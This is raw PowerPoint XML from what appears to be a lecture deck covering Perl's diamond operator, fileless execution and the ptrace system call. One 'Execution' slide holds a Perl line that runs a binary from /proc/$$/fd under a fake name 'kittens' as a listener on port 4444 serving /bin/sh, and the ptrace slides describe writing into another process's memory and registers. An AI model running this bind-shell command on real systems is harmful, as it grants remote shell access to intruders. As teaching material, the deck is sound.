              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Subsequent encounters with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> will read in subsequent lines of the same file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>After the last line was read in from the current file, the next encounter with the diamond operator will repeat the above operation starting by shifting the first value from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@ARGV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$ARGV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>If there are no more entries in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>@ARGV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> array, the diamond operator will return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>undef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> loop will exit.</a:t>
            </a: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38</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Diamond Operator (2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Gabor Szabo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3353019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4D8E5F0F-18B6-476F-B4C9-B60BEC150E7D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Execution </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>itw01.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>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3284984"/>
            <a:ext cx="8908486" cy="1895078"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7703608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endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" dirty="0"/>
              <a:t>Part 3</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4000"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40</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5852956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0" y="2675467"/>
            <a:ext cx="8712967" cy="609517"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> {"/proc/$$/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"} "kittens", "-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kvl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", "4444", "-e", "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A7441"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" or die "exec: $!"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A7441"/>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41</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>itw01.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖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9632" y="3656323"/>
            <a:ext cx="6985000" cy="2222500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14314276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endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptrace</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>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42</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3124256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1" y="2675467"/>
            <a:ext cx="8640960" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>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NAME </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> - process trace </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SYNOPSIS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;sys/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptrace.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</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 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </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long </a:t>
            </a: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a:t>
            </a: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enum</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 __</a:t>
            </a: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ptrace_request</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 request, </a:t>
            </a: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pid_t</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 </a:t>
            </a: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pid</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 void *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, void *data);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>The value of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t> determines the action to be performed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>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dirty="0"/>
              <a:t> Protocol </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>高魁良</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000"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43</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31446492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fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PTRACE_ATTACH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - Allows one process to attach itself to another for debugging, pausing the remote process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PTRACE_PEEKTEXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - Allows the reading of memory from another process address space.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PTRACE_POKETEXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - Allows the writing of memory to another process address space.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PTRACE_GETREGS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - Reads the current set of processor registers from a process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PTRACE_SETREGS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - Writes to the current set of processor registers of a process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PTRACE_CONT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> - Resumes the execution of an attached process.</a:t>
            </a:r>
          </a:p>
          <a:p>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44</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Some Actions Specified by Argument </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Adam Chester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13050266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804389" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>The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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>system call provides a means by which one process (the "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
